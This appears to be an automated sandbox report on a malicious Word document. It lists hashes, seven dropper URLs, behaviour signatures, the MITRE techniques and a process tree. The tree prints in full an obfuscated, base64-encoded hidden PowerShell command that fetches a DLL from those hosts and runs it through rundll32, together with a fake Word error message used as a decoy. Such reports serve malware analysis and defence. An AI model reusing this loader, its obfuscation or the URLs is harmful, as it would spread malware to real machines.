Analysis

  • max time kernel
    144s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    22-05-2022 05:25

General

  • Target

    fzivjgfe.doc

  • Size

    154KB

  • MD5

    40f79fcaa6e497435e1ac54f87fe90ab

  • SHA1

    41acbe1239d7c21c6919033da6fd935db6ee1f58

  • SHA256

    43af38ecd27585f00463abfee0ca7f492fb36fa862c8d215447d59be27652589

  • SHA512

    93e3876bf713ea07d0302cc2f3432c0aa0365e2d3a5d2babe751a198fde4a0c9b4a080804166485e2843a0ec7e071b7748126bdd7d79472ede19c9fad3688d7a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://mediatorstewart.com/service-msc/3zZLr/

exe.dropper

http://wolffsachs.com/wp-content/UKZw/

exe.dropper

http://ycspreview.com/shubham/h7qna/

exe.dropper

http://wi360.com/wp-content/u/

exe.dropper

http://linkejet.com.br/cgi-bin/UQ/

exe.dropper

http://nuocmambamuoi.vn/wp-admin/Ty/

exe.dropper

http://ellinismos1922.gr/log/c99FG/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fzivjgfe.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1676
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JABTAG8AOQBSAHEAIAAgAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiAC0ARgAgACcALgBpAE8ALgBkAEkAUgBFAEMAJwAsACcARQAnACwAJwBNACcALAAnAHMAeQBzAHQAJwAsACcAdABvAHIAWQAnACkAOwAgACAAIAAgACQAeQB4AE4AdAA2AG0APQBbAFQAWQBQAEUAXQAoACIAewAyAH0AewA1AH0AewAzAH0AewAxAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE0AQQBuAEEARwBlACcALAAnAE8ASQBOAFQAJwAsACcAcwB5AHMAdABlAE0ALgBOAGUAVAAuACcALAAnAEMAZQBwACcALAAnAHIAJwAsACcAUwBlAFIAVgBpACcAKQA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAJwArACcAbwBuACcAKQArACgAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAFQANQB1ADEAawAyAHQAPQAkAEwAMwAwAEcAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEMAMwAwAEkAOwAkAEUAXwAzAFkAPQAoACcAWAA4ACcAKwAnADAARwAnACkAOwAgACgAIAAgAFYAQQBSAEkAQQBCAGwAZQAgACgAJwBzAG8AOQByACcAKwAnAFEAJwApACAALQB2AGEAbABVAGUAbwBuACkAOgA6ACIAQwBSAGAAZQBBAHQARQBgAGQAaQBgAFIAYABlAGMAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AEkAJwArACgAJwAxADAAJwArACcAcAAwACcAKQArACcAegBzAHsAMAB9ACcAKwAnAEIAdABqAGcAaABxAGYAewAnACsAJwAwAH0AJwApAC0ARgAgACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQARQA0ADAASgA9ACgAJwBHADkAJwArACcAMgBPACcAKQA7ACAAIAAkAFkAeABOAHQANgBNADoAOgAiAFMAZQBgAEMAdQBgAFIAaQB0AHkAcABSAG8AVABvAGAAYwBgAG8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQAWQA0ADgASwA9ACgAKAAnAEIAMAAnACsAJwA0ACcAKQArACcARgAnACkAOwAkAEIAcAB0ADcAeQA1AHoAIAA9ACAAKAAoACcATQAnACsAJwAyADEAJwApACsAJwBZACcAKQA7ACQATgAxADIAUQA9ACgAKAAnAE0AJwArACcANAAyACcAKQArACcAUgAnACkAOwAkAFEAaQB4AHcAaABmADIAPQAkAEgATwBNAEUAKwAoACgAJwBzACcAKwAnAHoAJwArACcASgAnACsAJwBJADEAJwArACgAJwAwACcAKwAnAHAAMAB6AHMAJwApACsAKAAnAHMAJwArACcAegBKACcAKwAnAEIAdABqAGcAaAAnACsAJwBxACcAKQArACgAJwBmAHMAJwArACcAegBKACcAKQApACAAIAAtAEMAcgBFAHAATABBAEMAZQAgACgAWwBDAEgAYQByAF0AMQAxADUAKwBbAEMASABhAHIAXQAxADIAMgArAFsAQwBIAGEAcgBdADcANAApACwAWwBDAEgAYQByAF0AOQAyACkAKwAkAEIAcAB0ADcAeQA1AHoAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABDADUANgBJAD0AKAAoACcASAAnACsAJwAxADMAJwApACsAJwBWACcAKQA7ACQASABnAGIAMAB5AGIAMAA9ACgAJwBdACcAKwAoACcAZQAnACsAJwAxAHIAJwApACsAKAAnAFsAUwAnACsAJwA6AC8ALwAnACsAJwBtAGUAJwApACsAJwBkAGkAJwArACgAJwBhAHQAbwAnACsAJwByAHMAdABlACcAKwAnAHcAYQAnACkAKwAnAHIAJwArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AJwArACcAcwBlACcAKQArACgAJwByAHYAaQBjACcAKwAnAGUALQBtACcAKwAnAHMAYwAnACkAKwAoACcALwAnACsAJwAzAHoAWgBMAHIALwAnACsAJwBAACcAKQArACcAXQAnACsAKAAnAGUAMQByAFsAUwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwBvAGwAJwApACsAKAAnAGYAJwArACcAZgBzAGEAYwBoACcAKQArACgAJwBzAC4AYwAnACsAJwBvAG0AJwArACcALwB3ACcAKQArACcAcAAtACcAKwAnAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwBVAEsAJwArACcAWgAnACkAKwAnAHcALwAnACsAJwBAAF0AJwArACgAJwBlACcAKwAnADEAcgBbACcAKQArACcAUwAnACsAKAAnADoAJwArACcALwAnACsAJwAvAHkAYwBzACcAKQArACcAcAByACcAKwAnAGUAJwArACgAJwB2ACcAKwAnAGkAZQB3AC4AJwApACsAKAAnAGMAJwArACcAbwBtACcAKQArACcALwBzACcAKwAnAGgAJwArACcAdQBiACcAKwAoACcAaABhAG0ALwBoADcAJwArACcAcQBuACcAKQArACgAJwBhAC8AJwArACcAQABdAGUAJwApACsAJwAxACcAKwAoACcAcgAnACsAJwBbAFMAJwArACcAOgAvAC8AdwAnACkAKwAoACcAaQAzACcAKwAnADYAJwArACcAMAAuAGMAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtAGMAJwArACcAbwBuAHQAZQBuACcAKQArACgAJwB0ACcAKwAnAC8AdQAvAEAAJwApACsAKAAnAF0AJwArACcAZQAxAHIAWwAnACsAJwBTACcAKQArACgAJwA6AC8ALwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAG4AawBlACcAKwAnAGoAJwApACsAJwBlAHQAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtACcAKwAnAC4AYgByAC8AYwBnAGkALQAnACsAJwBiACcAKQArACcAaQBuACcAKwAoACcALwBVAFEALwBAAF0AJwArACcAZQAxACcAKwAnAHIAJwArACcAWwBTADoAJwArACcALwAnACkAKwAoACcALwBuAHUAbwAnACsAJwBjACcAKQArACgAJwBtAGEAJwArACcAbQBiAGEAJwApACsAJwBtAHUAJwArACcAbwBpACcAKwAnAC4AdgAnACsAKAAnAG4AJwArACcALwB3ACcAKQArACgAJwBwACcAKwAnAC0AYQBkACcAKQArACgAJwBtACcAKwAnAGkAbgAnACkAKwAoACcALwBUAHkAJwArACcALwAnACkAKwAoACcAQABdAGUAJwArACcAMQAnACkAKwAoACcAcgBbACcAKwAnAFMAJwApACsAKAAnADoALwAvAGUAJwArACcAbABsACcAKQArACgAJwBpAG4AJwArACcAaQBzACcAKQArACcAbQBvACcAKwAoACcAcwAnACsAJwAxADkAJwApACsAJwAyACcAKwAoACcAMgAuACcAKwAnAGcAcgAvACcAKwAnAGwAbwBnAC8AJwArACcAYwA5ACcAKQArACcAOQBGACcAKwAnAEcALwAnACkALgAiAHIARQBwAGAAbABBAEMARQAiACgAKAAoACcAXQBlADEAJwArACcAcgBbACcAKQArACcAUwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABwAEwAaQBUACIAKAAkAFcANAA5AFIAIAArACAAJABUADUAdQAxAGsAMgB0ACAAKwAgACQAQgA1ADgAQQApADsAJABCADMAMABXAD0AKAAoACcARgAnACsAJwA4ADYAJwApACsAJwBGACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBiAGYAOAA0ADMAeQAgAGkAbgAgACQASABnAGIAMAB5AGIAMAApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAcwB5AHMAdABlAE0ALgBuAGUAdAAuAFcAZQBiAEMATABJAGUAbgBUACkALgAiAGQAYABPAGAAVwBOAGwAbwBBAGQAZgBJAEwAZQAiACgAJABRAGIAZgA4ADQAMwB5ACwAIAAkAFEAaQB4AHcAaABmADIAKQA7ACQAUQAyADEATAA9ACgAJwBSADQAJwArACcAXwBZACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGkAeAB3AGgAZgAyACkALgAiAEwAZQBuAEcAYABUAEgAIgAgAC0AZwBlACAANAA5ADMAMwA4ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFEAaQB4AHcAaABmADIALAAoACgAJwBDAG8AJwArACcAbgB0AHIAbwAnACsAJwBsACcAKwAnAF8AUgAnACkAKwAnAHUAbgAnACsAKAAnAEQAJwArACcATABMACcAKQApAC4AIgB0AE8AcwBUAGAAUgBpAE4ARwAiACgAKQA7ACQAVwAzADAAUQA9ACgAKAAnAEcAJwArACcANQA5ACcAKQArACcASAAnACkAOwBiAHIAZQBhAGsAOwAkAFEAMgA4AFcAPQAoACcATAA4ACcAKwAnAF8AQgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AMQA5AEsAPQAoACcASAAnACsAKAAnADQAJwArACcANgBFACcAKQApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:220
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD JABTAG8AOQBSAHEAIAAgAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiAC0ARgAgACcALgBpAE8ALgBkAEkAUgBFAEMAJwAsACcARQAnACwAJwBNACcALAAnAHMAeQBzAHQAJwAsACcAdABvAHIAWQAnACkAOwAgACAAIAAgACQAeQB4AE4AdAA2AG0APQBbAFQAWQBQAEUAXQAoACIAewAyAH0AewA1AH0AewAzAH0AewAxAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE0AQQBuAEEARwBlACcALAAnAE8ASQBOAFQAJwAsACcAcwB5AHMAdABlAE0ALgBOAGUAVAAuACcALAAnAEMAZQBwACcALAAnAHIAJwAsACcAUwBlAFIAVgBpACcAKQA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAJwArACcAbwBuACcAKQArACgAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAFQANQB1ADEAawAyAHQAPQAkAEwAMwAwAEcAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEMAMwAwAEkAOwAkAEUAXwAzAFkAPQAoACcAWAA4ACcAKwAnADAARwAnACkAOwAgACgAIAAgAFYAQQBSAEkAQQBCAGwAZQAgACgAJwBzAG8AOQByACcAKwAnAFEAJwApACAALQB2AGEAbABVAGUAbwBuACkAOgA6ACIAQwBSAGAAZQBBAHQARQBgAGQAaQBgAFIAYABlAGMAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AEkAJwArACgAJwAxADAAJwArACcAcAAwACcAKQArACcAegBzAHsAMAB9ACcAKwAnAEIAdABqAGcAaABxAGYAewAnACsAJwAwAH0AJwApAC0ARgAgACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQARQA0ADAASgA9ACgAJwBHADkAJwArACcAMgBPACcAKQA7ACAAIAAkAFkAeABOAHQANgBNADoAOgAiAFMAZQBgAEMAdQBgAFIAaQB0AHkAcABSAG8AVABvAGAAYwBgAG8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQAWQA0ADgASwA9ACgAKAAnAEIAMAAnACsAJwA0ACcAKQArACcARgAnACkAOwAkAEIAcAB0ADcAeQA1AHoAIAA9ACAAKAAoACcATQAnACsAJwAyADEAJwApACsAJwBZACcAKQA7ACQATgAxADIAUQA9ACgAKAAnAE0AJwArACcANAAyACcAKQArACcAUgAnACkAOwAkAFEAaQB4AHcAaABmADIAPQAkAEgATwBNAEUAKwAoACgAJwBzACcAKwAnAHoAJwArACcASgAnACsAJwBJADEAJwArACgAJwAwACcAKwAnAHAAMAB6AHMAJwApACsAKAAnAHMAJwArACcAegBKACcAKwAnAEIAdABqAGcAaAAnACsAJwBxACcAKQArACgAJwBmAHMAJwArACcAegBKACcAKQApACAAIAAtAEMAcgBFAHAATABBAEMAZQAgACgAWwBDAEgAYQByAF0AMQAxADUAKwBbAEMASABhAHIAXQAxADIAMgArAFsAQwBIAGEAcgBdADcANAApACwAWwBDAEgAYQByAF0AOQAyACkAKwAkAEIAcAB0ADcAeQA1AHoAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABDADUANgBJAD0AKAAoACcASAAnACsAJwAxADMAJwApACsAJwBWACcAKQA7ACQASABnAGIAMAB5AGIAMAA9ACgAJwBdACcAKwAoACcAZQAnACsAJwAxAHIAJwApACsAKAAnAFsAUwAnACsAJwA6AC8ALwAnACsAJwBtAGUAJwApACsAJwBkAGkAJwArACgAJwBhAHQAbwAnACsAJwByAHMAdABlACcAKwAnAHcAYQAnACkAKwAnAHIAJwArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AJwArACcAcwBlACcAKQArACgAJwByAHYAaQBjACcAKwAnAGUALQBtACcAKwAnAHMAYwAnACkAKwAoACcALwAnACsAJwAzAHoAWgBMAHIALwAnACsAJwBAACcAKQArACcAXQAnACsAKAAnAGUAMQByAFsAUwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwBvAGwAJwApACsAKAAnAGYAJwArACcAZgBzAGEAYwBoACcAKQArACgAJwBzAC4AYwAnACsAJwBvAG0AJwArACcALwB3ACcAKQArACcAcAAtACcAKwAnAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwBVAEsAJwArACcAWgAnACkAKwAnAHcALwAnACsAJwBAAF0AJwArACgAJwBlACcAKwAnADEAcgBbACcAKQArACcAUwAnACsAKAAnADoAJwArACcALwAnACsAJwAvAHkAYwBzACcAKQArACcAcAByACcAKwAnAGUAJwArACgAJwB2ACcAKwAnAGkAZQB3AC4AJwApACsAKAAnAGMAJwArACcAbwBtACcAKQArACcALwBzACcAKwAnAGgAJwArACcAdQBiACcAKwAoACcAaABhAG0ALwBoADcAJwArACcAcQBuACcAKQArACgAJwBhAC8AJwArACcAQABdAGUAJwApACsAJwAxACcAKwAoACcAcgAnACsAJwBbAFMAJwArACcAOgAvAC8AdwAnACkAKwAoACcAaQAzACcAKwAnADYAJwArACcAMAAuAGMAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtAGMAJwArACcAbwBuAHQAZQBuACcAKQArACgAJwB0ACcAKwAnAC8AdQAvAEAAJwApACsAKAAnAF0AJwArACcAZQAxAHIAWwAnACsAJwBTACcAKQArACgAJwA6AC8ALwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAG4AawBlACcAKwAnAGoAJwApACsAJwBlAHQAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtACcAKwAnAC4AYgByAC8AYwBnAGkALQAnACsAJwBiACcAKQArACcAaQBuACcAKwAoACcALwBVAFEALwBAAF0AJwArACcAZQAxACcAKwAnAHIAJwArACcAWwBTADoAJwArACcALwAnACkAKwAoACcALwBuAHUAbwAnACsAJwBjACcAKQArACgAJwBtAGEAJwArACcAbQBiAGEAJwApACsAJwBtAHUAJwArACcAbwBpACcAKwAnAC4AdgAnACsAKAAnAG4AJwArACcALwB3ACcAKQArACgAJwBwACcAKwAnAC0AYQBkACcAKQArACgAJwBtACcAKwAnAGkAbgAnACkAKwAoACcALwBUAHkAJwArACcALwAnACkAKwAoACcAQABdAGUAJwArACcAMQAnACkAKwAoACcAcgBbACcAKwAnAFMAJwApACsAKAAnADoALwAvAGUAJwArACcAbABsACcAKQArACgAJwBpAG4AJwArACcAaQBzACcAKQArACcAbQBvACcAKwAoACcAcwAnACsAJwAxADkAJwApACsAJwAyACcAKwAoACcAMgAuACcAKwAnAGcAcgAvACcAKwAnAGwAbwBnAC8AJwArACcAYwA5ACcAKQArACcAOQBGACcAKwAnAEcALwAnACkALgAiAHIARQBwAGAAbABBAEMARQAiACgAKAAoACcAXQBlADEAJwArACcAcgBbACcAKQArACcAUwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABwAEwAaQBUACIAKAAkAFcANAA5AFIAIAArACAAJABUADUAdQAxAGsAMgB0ACAAKwAgACQAQgA1ADgAQQApADsAJABCADMAMABXAD0AKAAoACcARgAnACsAJwA4ADYAJwApACsAJwBGACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBiAGYAOAA0ADMAeQAgAGkAbgAgACQASABnAGIAMAB5AGIAMAApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAcwB5AHMAdABlAE0ALgBuAGUAdAAuAFcAZQBiAEMATABJAGUAbgBUACkALgAiAGQAYABPAGAAVwBOAGwAbwBBAGQAZgBJAEwAZQAiACgAJABRAGIAZgA4ADQAMwB5ACwAIAAkAFEAaQB4AHcAaABmADIAKQA7ACQAUQAyADEATAA9ACgAJwBSADQAJwArACcAXwBZACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGkAeAB3AGgAZgAyACkALgAiAEwAZQBuAEcAYABUAEgAIgAgAC0AZwBlACAANAA5ADMAMwA4ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFEAaQB4AHcAaABmADIALAAoACgAJwBDAG8AJwArACcAbgB0AHIAbwAnACsAJwBsACcAKwAnAF8AUgAnACkAKwAnAHUAbgAnACsAKAAnAEQAJwArACcATABMACcAKQApAC4AIgB0AE8AcwBUAGAAUgBpAE4ARwAiACgAKQA7ACQAVwAzADAAUQA9ACgAKAAnAEcAJwArACcANQA5ACcAKQArACcASAAnACkAOwBiAHIAZQBhAGsAOwAkAFEAMgA4AFcAPQAoACcATAA4ACcAKwAnAF8AQgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AMQA5AEsAPQAoACcASAAnACsAKAAnADQAJwArACcANgBFACcAKQApAA==
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5104
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\I10p0zs\Btjghqf\M21Y.dll,Control_RunDLL
          3⤵
            PID:2284

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\I10p0zs\Btjghqf\M21Y.dll
        Filesize

        67KB

        MD5

        2a88b493cb6fe862b887d6316fad5a3d

        SHA1

        f15dd8ce02fba26d776cfe70f4884b84d92f3448

        SHA256

        0e56b79f74d3cb96da47d2d2dc0234b52eb9c83707d1005c2ff05740626feded

        SHA512

        62d7f0dbc915f13b100841823aad6384f66c2b06630f9bc36900a746bde7631a4ba93ff1efeecb0117394efb15d762bed9f69a2eb6250ff20f9ea4bb341a37d1

      • memory/220-137-0x0000000000000000-mapping.dmp
      • memory/1676-134-0x00007FF803530000-0x00007FF803540000-memory.dmp
        Filesize

        64KB

      • memory/1676-131-0x00007FF803530000-0x00007FF803540000-memory.dmp
        Filesize

        64KB

      • memory/1676-130-0x00007FF803530000-0x00007FF803540000-memory.dmp
        Filesize

        64KB

      • memory/1676-135-0x00007FF8013C0000-0x00007FF8013D0000-memory.dmp
        Filesize

        64KB

      • memory/1676-136-0x00007FF8013C0000-0x00007FF8013D0000-memory.dmp
        Filesize

        64KB

      • memory/1676-132-0x00007FF803530000-0x00007FF803540000-memory.dmp
        Filesize

        64KB

      • memory/1676-147-0x00007FF803530000-0x00007FF803540000-memory.dmp
        Filesize

        64KB

      • memory/1676-146-0x00007FF803530000-0x00007FF803540000-memory.dmp
        Filesize

        64KB

      • memory/1676-145-0x00007FF803530000-0x00007FF803540000-memory.dmp
        Filesize

        64KB

      • memory/1676-144-0x00007FF803530000-0x00007FF803540000-memory.dmp
        Filesize

        64KB

      • memory/1676-133-0x00007FF803530000-0x00007FF803540000-memory.dmp
        Filesize

        64KB

      • memory/2284-141-0x0000000000000000-mapping.dmp
      • memory/5104-140-0x00007FF8177F0000-0x00007FF8182B1000-memory.dmp
        Filesize

        10.8MB

      • memory/5104-139-0x000002AD68610000-0x000002AD68632000-memory.dmp
        Filesize

        136KB

      • memory/5104-138-0x0000000000000000-mapping.dmp